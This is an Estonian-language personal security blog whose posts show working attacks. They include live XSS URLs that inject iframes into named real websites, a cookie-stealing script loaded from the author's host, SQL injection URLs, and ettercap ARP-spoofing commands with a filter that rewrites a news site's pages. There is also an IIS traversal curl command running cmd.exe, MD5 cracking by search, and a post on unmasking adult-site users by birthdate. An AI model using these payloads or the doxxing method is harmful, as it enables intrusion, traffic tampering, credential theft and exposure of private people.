GNUPG September 8, 2009 at 10:28 am
To export, use:
gpg –armor –export mymail@here.com > public.asc
gpg –armor –export-secret-key mymail@here.com > private.asc
To import, use:
gpg –import public.asc
gpg –allow-secret-key-import private.asc
Category / Turvalisus
XSS ja loll saab kirikus ka peksa January 10, 2009 at 1:42 am
Irooniline. Paar aastat tagasi sai teavitatud usk.ee webmasterit nende lehel asuvast XSS august. Muutus see et neil avati uue kujundusega leht.
Oma fantaasia ja oskuste piires saab seal lõbutseda ka täna
dsniff February 1, 2008 at 4:22 pm
Väga väärtuslik tool, juhul kui on vaja leida mõni kadunud parool.
Mysql & SQL injection October 18, 2007 at 3:37 pm
Tänapäeval on väga väga suur hulk veebilahendusi n.n LAMP (Linux, Apache, MySql, Php) tüüpi. Paar huvitavat MySql apsu mida võib kergelt teha.
Meil on tabel test id int, name varchar(255)
http://ftp.margusja.pri.ee/mysql/?id=1
Meil on php sees sql $query =”SELECT * FROM demo where id = $id” kui see niimoodi kirjutada ja GET parameetrit id ei kontrollita siis on võimalik kasutada n.n blind sql meetodit.
http://ftp.margusja.pri.ee/mysql/?id=1 annab meile tulemuse. Proovime siis muuta urli real get parameetrit id. http://ftp.margusja.pri.ee/mysql/?id=1+and+1=2 – tulemust ei ole, kuigi id=1. Järelikult on meil võimalus mõjutada SLQ lauset mida php käivitab. Mida huvitavat selle tulemuselt teha saab on nüüd igaühe oskuste asi aga paar näidet siia.
http://ftp.margusja.pri.ee/mysql/?id=2+union+select+12,version() - MySql serveri versioon
http://ftp.margusja.pri.ee/mysql/?id=2+union+select+12,user() - kasutaja ja host antud koodi suhtes.
Oletame et tabelis on mitmeid kirjeid. Üks võimalus on proovida id=x, id=x+1 jne…
Samas kui on jäetud selline auk siis toimiba ka
http://ftp.margusja.pri.ee/mysql/?id=0+or+id>0 = http://ftp.margusja.pri.ee/mysql/?id=0+or+id%3C0 st. %3E =>
Siin on veel palju ja palju võimalusi. Aga mida siis annab teha et teie tehtud lahendust seda
kaudu nii kergelt ei saaks lammutada?
Kindlasti kontrollige oma GET/POST/ muutujad enne kui annate need koodi kätte.
Social engineering June 14, 2007 at 10:47 pm
Võtame täiskasvanutele mõeldud portaali www.sexinestonia.com Ilus kena. Huvitavad pildid. Lisaks kõigele kui detailvaadet vaadata siis näeme et paljud on täitnud kenasti ausalt ära vanuse.
http://www.sexinestonia.com/index.php?id=user&user=26285 üsna tagasihoidlik näide. Kena mimm. Tahaksite tema kohta rohkem infot aga palun siinkohal tuleb meile appi www.rate.ee otsing sisestate sinna otsingusse vastavalt sünni päeva, kuu ja aasta ja voila http://www.rate.ee/show.php?id=11534564
Nmap February 18, 2007 at 4:21 pm
Võrgu ja remote info kogumisel on üks asendamatu tool nmap. Paar näidet siin.
nmap -sV host hosti lahtised pordid ja seal reaalselt kuulavad teenused.
nmap -O -v OS detection.
ettercap February 16, 2007 at 6:12 pm
Ettercap http://ettercap.sourceforge.net/) on üks mega-power-tool ja niisama ajaviitmise riist ka. Siinkohal hakkan seda ise natuke lahkama ja panen siia siis kirja kuidas läheb. Aeg on näidanud et kui mingi asjaga ikka pidevalt ei tegele siis lähed rooste. Samas kui on kusagilt väga lihtsad näited võtta siis võib ka roostes ollas tuusa mulje jätta 
* ettercap -P list – peaks andma kasutatavate pluginate listi
* ettercap -Tq -i [interface]-M arp:remote // – kogu LAN. Suurema kohtvõrgu puhul ei pruugi teie võrgukaart piisav olla. Kui soovi kindel grupp koosatada siis saab seda määrata /192.168.0.1(gw),100(victim1)/ – antud juhul olete 192.168.0.1 ja 192.168.0.100 liikluse vahel.
Võtame siis esimese ja kõige karmima case. LAN peal MITMA (Man In The Middle Attac)
Enne kui ilmusid switchid oli asi lihtne. Kõike pakette karjuti terve võrgu peale. Nüüd larjutakse kogu võrgule vähe, kuid siiski. Üks neist on ARP päringud. Kuna ARP toimib LAN peal siis ei peeta seda kuigi ohtlikuks. KUID!!! Tuleb teie kontorise klient ja soovib oma sülearvuti panna teie sisevõrku ja kogub umbes 1h jooksul kõik liikluse oma arvutisse. Hiljem siis kodus analüüsib seda ja… edasi te ei taha teada.
Kuidas ta seda siis teeb.
LINUX: echo 1 > /proc/sys/net/ipv4/ip_forward BSD: sysctl -w net.inet.ip.forwarding=1
- Seda selleks et liiklus arvutisse pidama ei jääks.
ettercap -o -T -P repoison_arp -M arp:remote /VIGTIM IP/ /GW IP/
Mis iganes on vahepeal arenenud (29.05.2008) aga MAX OS X 10.5 ja port pealt kokku lastud ettercap pelab siin: ettercap -a -i en(n) victimIP GW-IP. Kõrvale wireshark käima ja oled kohe terve LAN-i hirm ja kunn.
Mis siis toimub. LAN peal on switchides ja arvutites ARP tabelid kus on kirjas IP aadress ja MAC aadress. Kui nüüd mingi paket LAN peal liigub siis paketi sees on src IP ja target IP masinad siis võrdlevad ARP tablelitest kuhu MACi peale seda saata. Kuna aga ARPi võivad LAN peal saata kõik siis võib häkker karjuda LAN peale et tema mac on GW mac. Sellest piisab et kogu liiklus või siis vastava arvuti liiklus käib läbi häkkeri arvuti.
—
etterfilter - Päris põnev mänguasi millega saad mõjutada enda käes olevat liiklust.
Võtame lehe www.delfi.ee
avame tekstieditori ja kirjutame sinna:
# Kuna veebiserverid saadavad vastuseid pakitult ja meie ei soovi seda siis lihtsalt saadame serverile suvalise encodingu, peaasi et sama pika. Nüüd peaksime vastu puhast teksit saama
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
# antud osa on juba igaühe enda teha. Siin lihtsalt näide.
if (ip.proto == TCP && tcp.src == 80) {
replace(“Loe”, “Jipikajee mader fakker”);
msg(“Filter Ran.\n”);
}
Kompileerime:
etterfilter delfi.filter -o delfi.ef
ja käivitame rünnaku:
ettercap -i en1 -T -q -F delfi.ef -M ARP // või /192.168.0.1(gw),100(victim 192.168.0.100)
Kui nüüd kõik kenasti laabus, seal on veel omad nipid ja nõksud, vahel peab root kasutaja alt tegema või siis vajalikes kohas vajalikud õigused, igatahes kui nüüd sama LAN-i peale keegi www.delfi.ee peale satub siis võib ta seal Loe asemel suht naljakat asja kohata.
See oli lihtsalt näide. Antud lõik ei kutsu kuidagi delfi.ee maha tegema vaid oli suvaline näide.
Kui sina võid seda teha siis võib seda ükskõik kes. Seega kontrolli kas võrk on puhas sinusugustest.
* ettercap -c -N
* ettercap -l -N annab hea ülevaate võrgus asuvate masinate IP-de ja MAC aadressidest.
HOH February 13, 2007 at 6:32 pm
- http://retrogod.altervista.org/GHDB.TXT
Info saamine on väga oluline. Kui me räägime domeenidest siis mitte käsureal ennast väga mugavatele inimestele siin paar abiks saiti. Teine hea omdus on neil ehk ka see, et te ei pea “testimise” ajal leidma mingit proxyt mis on teadagi suht aeglane.Internet Assigned Number Autority – http://www.iana.com Siin saab root domeenide kohta infot. Näiteks .ee domeen http://www.iana.com/root-whois/ee.htm
www.dnsstuff.com – Erinevaid web based toole DNS kirjete jaoks.
http://www.ip-plus.net/tools/tools.en.html – siin saab vabalt axfr NS päringuid teha ilma et ise silma paistaks.
host -t axfr gov.uk [ns server] annab antud domeeni all asuvad saidid.
whois on power tool. Tasub silmas pidada et whois NIMI ja whois IP annavad totaalselt erinevad tulemused. Näiteks aadressiruumi saab just whois IP järgi inetnum kirje sees. See vahemik scanneriga võib anda päris huvitavaid tulemusi.
http://sec.angrypacket.com/code/blindcrawl.pl – hea script hostide nimede testimiseks.
NSTX ja IODINE ip over DNS – päris abix tasuta interneti loomiseks.
Cryptitud admed näiteks paroolifailid – Väike test. Teisendame seks md5 kujule (md5 online või teie oma md5 func) ja saame 1af946f0cd9c9568b26a40a705c3df7c see tulemus omakorda googlesse ja esimene tulemus on:SeniorSite v.1.4.1[SSUser]: loaded user (login: petermc, pass: 1af946f0cd9c9568b26a40a705c3df7c, id: 809, auth: , fullname: Peter MC, email: petermc@skizoklan.dkactivated: …
Siinkohal ei hakka urli mina tooma aga urlile minnes paistis sealt mingi foorum kuhu sai kenasti sisse petermc ja seks. Mis point on? Isegi cryptitud andmeid ei tohiks lohakalt hoida.
www.netcraft.com – veebiserveri kohta korralikult infot.nmap -sV Võti on oluline, sest siis näeb reaalseid teenuseid mis portides jooksevad.
openssl-too-open http://www.phreedom.org/solar/exploits/apache-openssl/
—
http://www.zone-h.org/ – Päris hea online list maha võetud saitidest ja kuidas võeti.
www.proxy4free.com – avalikud proxy (high anonymity)
rootkit -
port knocking
www.mikx.de – dude otsib brauserite auke.
kmod ptrace
..%255c..\\winnt\\system32\\cmd.exe?/c%20dir
curl “http://192.168.10.149/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c\\winnt\\system32\\cmd.exe?/c%20type%20\\Inetpub\\Flightlist\\Flightlist.txt”
IISI peal failinime l6ppu +.htr
ettercap fun filter
paroolide cryptimine john paroolifail õigel kujul ette.
Huvitavaid tulemusi saab googlest erinevaid failityype otsides näiteks inc paljud progejad incluudivad sedatyypi faile. samas neid otse küsides veebiserver annab source koodi.
Protected: Nuu nuu! February 3, 2007 at 12:35 am
XXS funn and Cookies stealing October 13, 2006 at 10:50 pm
http://www.skydive.ee/?op=search&sw=%3Ciframe%20src=http://www.hot.ee/kalamaja1991/skydive.html%20width=1000%20height=1000%3E ja link
http://www.usk.ee/links.php?search=%3Ciframe+src%3Dhttp://ftp.margusja.pri.ee/GAY.JPG%20width=500%20height=500%3E&andor=and&submit=Otsi ja link
Oletame, et te leiate koha kus saab n.n HTML-i injectida, Otsinguformid, html-i lubavad foorumid, kommentaarimise formid jne…
Lisate sinna rea javascriptis mis kutsub välja http://ftp.margusja.pri.ee/s.jc. Tulemust näete siin
Keskerakonna Haabersti leht <Link>
